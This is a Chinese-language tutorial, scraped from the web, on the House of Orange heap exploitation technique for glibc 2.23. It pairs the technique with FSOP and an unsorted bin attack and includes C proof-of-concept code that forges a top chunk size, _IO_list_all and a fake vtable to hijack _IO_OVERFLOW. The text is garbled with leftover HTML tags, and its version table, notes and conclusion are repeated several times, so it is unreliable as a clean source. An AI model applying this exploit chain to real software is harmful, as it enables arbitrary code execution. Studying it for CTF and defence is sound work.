House of Orange及其IO组合攻击学习利用<\/h1>

前言<\/h2>
House of orange是glibc 2.23下常用的一种攻击手法，用于在程序中没有free函数的情况下，通过堆溢出结合IO_FILE结构体利用实现任意代码执行。本文将从原理到实践详细解析这种攻击方式。<\/p>

攻击原理<\/h2>

House of Orange核心机制<\/h3>

当程序申请堆块时，如果top chunk大小不足：<\/p>

将old top chunk放入unsorted bin<\/li>
重新映射一块新的top chunk<\/li> <\/ul> <\/li>

利用条件：<\/p>

存在堆溢出漏洞<\/li>

能够控制top chunk的size字段<\/li> <\/ul> <\/li> <\/ol>

关键检查绕过<\/h3>

通过堆溢出伪造top chunk size时需要满足以下条件：<\/p>

assert ((old_top ==<\/span> initial_top (av) &&<\/span> old_size ==<\/span> 0<\/span>) ||<\/span>
<\/span><\/span>        ((unsigned<\/span> long<\/span>) (old_size) >=<\/span> MINSIZE &&<\/span>
<\/span><\/span>         prev_inuse (old_top) &&<\/span>
<\/span><\/span>         ((unsigned<\/span> long<\/span>) old_end &<\/span> (pagesize -<\/span> 1<\/span>)) ==<\/span> 0<\/span>));
<\/span><\/span>assert ((unsigned<\/span> long<\/span>) (old_size) <<\/span> (unsigned<\/span> long<\/span>) (nb +<\/span> MINSIZE));
<\/span><\/span><\/code><\/pre>具体伪造要求：<\/p>

old top chunk的size ≥ MINSIZE (0x10)<\/li>
prev_inuse位设置为1<\/li>
old top chunk地址+size后的地址要与页对齐(address & 0xfff == 0x000)<\/li>
old chunk的size < 申请大小 + MINSIZE<\/li>
<\/ul>
组合攻击流程<\/h2>
1. House of Orange触发<\/h3>

申请一个初始堆块<\/li>
通过堆溢出修改top chunk的size为较小值<\/li>
申请一个大于修改后top chunk size的堆块，触发：

old top chunk被放入unsorted bin<\/li>
系统分配新的top chunk<\/li>
<\/ul>
<\/li>
<\/ol>
2. FSOP (File Stream Oriented Programming)<\/h3>
攻击目标是_IO_FILE_plus<\/code>结构体：<\/p>
struct<\/span> _IO_FILE_plus {
<\/span><\/span>    _IO_FILE file;
<\/span><\/span>    IO_jump_t *<\/span>vtable;
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>伪造要点：<\/p>

设置_mode <= 0<\/code><\/li>
设置_IO_write_ptr > _IO_write_base<\/code><\/li>
伪造vtable，将_IO_OVERFLOW<\/code>函数指针替换为system<\/li>
在结构体开头写入"\/bin\/sh\x00"<\/li>
<\/ol>
3. Unsorted Bin Attack<\/h3>
利用unsorted bin的bk指针修改_IO_list_all<\/code>：<\/p>

将unsorted bin chunk的bk设置为io_list_all - 0x10<\/code><\/li>
当再次分配时，_IO_list_all<\/code>会被修改为main_arena+88<\/li>
通过精心构造的偏移，使伪造的IO_FILE结构体被链表遍历到<\/li>
<\/ol>
实际利用示例<\/h2>
样例代码分析<\/h3>
\/\/ 1. 触发House of Orange
<\/span><\/span><\/span><\/span>p1 =<\/span> malloc(0x400<\/span>-<\/span>16<\/span>);
<\/span><\/span>top =<\/span> (size_t *<\/span>) ((char<\/span> *<\/span>) p1 +<\/span> 0x400<\/span> -<\/span> 16<\/span>);
<\/span><\/span>top[1<\/span>] =<\/span> 0xc01<\/span>; \/\/ 修改top chunk size
<\/span><\/span><\/span><\/span>p2 =<\/span> malloc(0x1000<\/span>); \/\/ 触发机制
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 2. 准备FSOP
<\/span><\/span><\/span><\/span>io_list_all =<\/span> top[2<\/span>] +<\/span> 0x9a8<\/span>; \/\/ 计算io_list_all地址
<\/span><\/span><\/span><\/span>top[3<\/span>] =<\/span> io_list_all -<\/span> 0x10<\/span>; \/\/ unsorted bin attack准备
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 3. 伪造IO_FILE结构体
<\/span><\/span><\/span><\/span>memcpy((char<\/span> *<\/span>) top, "\/bin\/sh<\/span>\x00<\/span>"<\/span>, 8<\/span>); \/\/ 写入"\/bin\/sh"
<\/span><\/span><\/span><\/span>top[1<\/span>] =<\/span> 0x61<\/span>; \/\/ 修改size为0x61
<\/span><\/span><\/span><\/span>FILE *<\/span>fp =<\/span> (FILE *<\/span>) top;
<\/span><\/span>
<\/span><\/span>\/\/ 设置FSOP必要字段
<\/span><\/span><\/span><\/span>fp-><\/span>_mode =<\/span> 0<\/span>; 
<\/span><\/span>fp-><\/span>_IO_write_base =<\/span> (char<\/span> *<\/span>) 2<\/span>;
<\/span><\/span>fp-><\/span>_IO_write_ptr =<\/span> (char<\/span> *<\/span>) 3<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 伪造vtable
<\/span><\/span><\/span><\/span>size_t *<\/span>jump_table =<\/span> &<\/span>top[12<\/span>];
<\/span><\/span>jump_table[3<\/span>] =<\/span> (size_t) &<\/span>winner; \/\/ _IO_OVERFLOW指向winner
<\/span><\/span><\/span><\/span>*<\/span>(size_t *<\/span>) ((size_t) fp +<\/span> sizeof<\/span>(FILE)) =<\/span> (size_t) jump_table;
<\/span><\/span>
<\/span><\/span>\/\/ 4. 触发利用
<\/span><\/span><\/span><\/span>malloc(10<\/span>); \/\/ 触发malloc_assert->abort()->_IO_flush_all_lockp
<\/span><\/span><\/span><\/code><\/pre>CTF例题分析<\/h3>
题目特征：<\/p>

有add、edit、show功能，无free<\/li>
edit存在堆溢出漏洞<\/li>
<\/ul>
利用步骤：<\/p>

修改top chunk size触发House of Orange<\/li>
泄露libc和堆地址<\/li>
构造伪造的IO_FILE结构体<\/li>
通过unsorted bin attack修改_IO_list_all<\/code><\/li>
触发malloc_assert执行攻击<\/li>
<\/ol>
版本适用性<\/h2>



版本<\/th>
适用性<\/th>
<\/tr>
<\/thead>


glibc 2.23<\/td>
完全适用<\/td>
<\/tr>

glibc 2.24<\/td>
加入vtable检查，需使用IO_str_jumps等合法vtable<\/td>
<\/tr>

glibc 2.26+<\/td>
malloc_printerr不再刷新IO流，攻击失效<\/td>
<\/tr>
<\/tbody>
<\/table>
注意事项<\/h2>

_mode<\/code>的正负性随机，有约50%失败概率<\/li>
申请大小超过0x20000会使用mmap而非扩展top chunk<\/li>
需要精确控制内存布局和偏移<\/li>
<\/ol>
总结<\/h2>
House of orange与IO流攻击的结合开创了堆与IO组合利用的先河，其思路巧妙，利用链完整。虽然后续版本增加了防护措施，但理解这种攻击方式对于学习更高级的IO利用技术至关重要。<\/p>

版本<\/th>	适用性<\/th> <\/tr> <\/thead>
glibc 2.23<\/td>	完全适用<\/td> <\/tr>
glibc 2.24<\/td>	加入vtable检查，需使用IO_str_jumps等合法vtable<\/td> <\/tr>
glibc 2.26+<\/td>	malloc_printerr不再刷新IO流，攻击失效<\/td> <\/tr> <\/tbody> <\/table> 注意事项<\/h2> `_mode<\/code>的正负性随机，有约50%失败概率<\/li>` `申请大小超过0x20000会使用mmap而非扩展top chunk<\/li>` `需要精确控制内存布局和偏移<\/li> <\/ol> 总结<\/h2> House of orange与IO流攻击的结合开创了堆与IO组合利用的先河，其思路巧妙，利用链完整。虽然后续版本增加了防护措施，但理解这种攻击方式对于学习更高级的IO利用技术至关重要。<\/p>`

House of Orange及其IO组合攻击学习利用<\/h1>

前言<\/h2> House of orange是glibc 2.23下常用的一种攻击手法，用于在程序中没有free函数的情况下，通过堆溢出结合IO_FILE结构体利用实现任意代码执行。本文将从原理到实践详细解析这种攻击方式。<\/p>

攻击原理<\/h2>

组合攻击流程<\/h2>

实际利用示例<\/h2>

总结<\/h2> House of orange与IO流攻击的结合开创了堆与IO组合利用的先河，其思路巧妙，利用链完整。虽然后续版本增加了防护措施，但理解这种攻击方式对于学习更高级的IO利用技术至关重要。<\/p>

前言<\/h2>
House of orange是glibc 2.23下常用的一种攻击手法，用于在程序中没有free函数的情况下，通过堆溢出结合IO_FILE结构体利用实现任意代码执行。本文将从原理到实践详细解析这种攻击方式。<\/p>

总结<\/h2>
House of orange与IO流攻击的结合开创了堆与IO组合利用的先河，其思路巧妙，利用链完整。虽然后续版本增加了防护措施，但理解这种攻击方式对于学习更高级的IO利用技术至关重要。<\/p>